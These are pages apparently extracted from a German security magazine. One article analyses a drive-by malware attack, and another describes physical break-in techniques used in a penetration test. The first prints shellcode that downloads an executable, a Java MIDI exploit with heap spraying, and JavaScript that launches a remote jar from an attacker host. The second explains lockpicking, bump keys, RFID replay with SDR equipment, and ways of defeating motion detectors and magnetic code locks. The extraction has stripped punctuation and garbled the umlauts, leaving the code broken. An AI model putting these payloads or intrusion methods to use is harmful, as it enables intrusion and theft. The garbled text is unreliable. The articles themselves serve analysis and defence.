A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
0000000000000000000000000000047657
454656D705061746841004C6F61644C696
272617279410047657450726F634164647
26573730057696E4578656300BB89F289F
730C0AE75FD29F789F931C0BE3C0000000
3B51B02000066AD03851B0200008B70788
3C61C03B51B0200008DBD1F020000AD038
51B020000ABAD03851B0200005
0ABAD03851B020000AB5E31DBAD5603851B02000089C689D751FCF
3A65974045E43EBE95E93D1E0038527020
00031F69666ADC1E00203851F02000089C
6AD03851B020000C3EB100000000000000
000000000000000000089851B020000565
7E858FFFFFF5F5EAB01CE803EBB7402EBE
DC355524C4D4F4E2E444C4C0055524C446
F776E6C6F6164546F46696C65410070646
67570642E65786500637261736
82E70687000
nops for the nop-slice
String str10 = 90909090
String java_version = SystemgetProperty(java
version)
url
String url = getParameter(data) applet method
int i = 0
int j = 0
while (urlcharAt(i) = )
j += urlcharAt(i)
i += 1
j += 7
j = 256
String checksum = IntegertoHexString(j)
checksum = 6e correct for the url
httparestyutecomsadhbdsa879321jbdasl
phpdeserialize=6eampi=1
if (urlindexOf(deserialize= + checksum) == -1)
return
10201014
FORTGESCHRITTENE
Zusaumltzlich wird noch das oben erwaumlhnte verschleierte JavaScript auf der urspruumlnglichen HTML-Seite geladen Dieses ist noch erstaunlicher denn es enthaumllt gleich ei-ne ganze Ladung von Exploits fuumlr Java Adobe Flash sowie Adobes PDF Reader bereit Der sbquoAuthorlsquo der Sei-te war auf houmlchste Kompatibilitaumlt aus denn auch hier werden nur bestimmte ndash vor allem neuere ndash Versionen der Browser Plugins unterstuumltzt (vgl Listing 5)
Unter httpwwwexploit-dbcomexploits12117 fin-det man eine Beschreibung der Schwachstelle Diese betrifft zusaumltzlich zum analysierten Applet die Java-Ver-sion 160_19
Zusammenfassend laumlsst sich feststellen dass Schadsoftware auf verschiedensten Wegen ins Sys-tem gelangen kann Es ist nicht mehr notwendig Programme zu installieren oder aumlhnliches Die hier beschriebene HTML-Datei koumlnnte auch in einem HTML-faumlhigen E-Mail-Client ausgefuumlhrt werden Ebenso kann die iFrame-Konstruktion in E-Mails platziert werden Es sind nicht nur einzelne Pro-gramme oder PlugIns fuumlr Browser betroffen son-dern es wird versucht gezielt neue Schwachstellen fuumlr mehrere populaumlre Programme zu finden was der letzte Ausschnitt des JavaScript-Codes zeigt Auch
Listing 4b Verifikation der als Parameter uumlbergebenen URL bdquohttparestyutecomsadhbdsa879321jbdaslphpdeserialize=6eampi=1rdquo
Object localObject1
Object localObject2
Object localObject4
Object localObject5
String str20
String str21
String str22
if ((((java_versionindexOf(160_11) = -1) ||
(java_versionindexOf(160_12) = -1) ||
(java_versionindexOf(160_13) = -1) ||
(java_versionindexOf(160_14) = -1) ||
(java_versionindexOf(160_15) = -1) ||
(java_versionindexOf(160_16) = -1) 1 0) amp
(urlindexOf(i=1) == -1 1 0)) = 0)
Java midi vulnerable see http
vreugdenhilresearchnl201005
java-midi-parse-vulnerabilities
for detailed explaination The author claims that it
was in java 160_19
localObject1 =
localObject1 = repeat( 303)
using windows no return
localObject2 = SystemgetProperty(osname)
toLowerCase()
if (((String)localObject2)indexOf(win) gt= 0)
localObject1 = repeat( 302)
else
return
the core of the vulnerable create a malicious url
and ask javas midiplayer to play
localObject1 = + (String)localObject1 +
ZZZZZZ
try
String str19 = url + 11
localObject4 =
for (int k = 0 k lt str19length() k++)
localObject4 = (String)localObject4 + Integer
toHexString(str19charAt(k))
while (((String)localObject4)length() 8 = 0)
localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
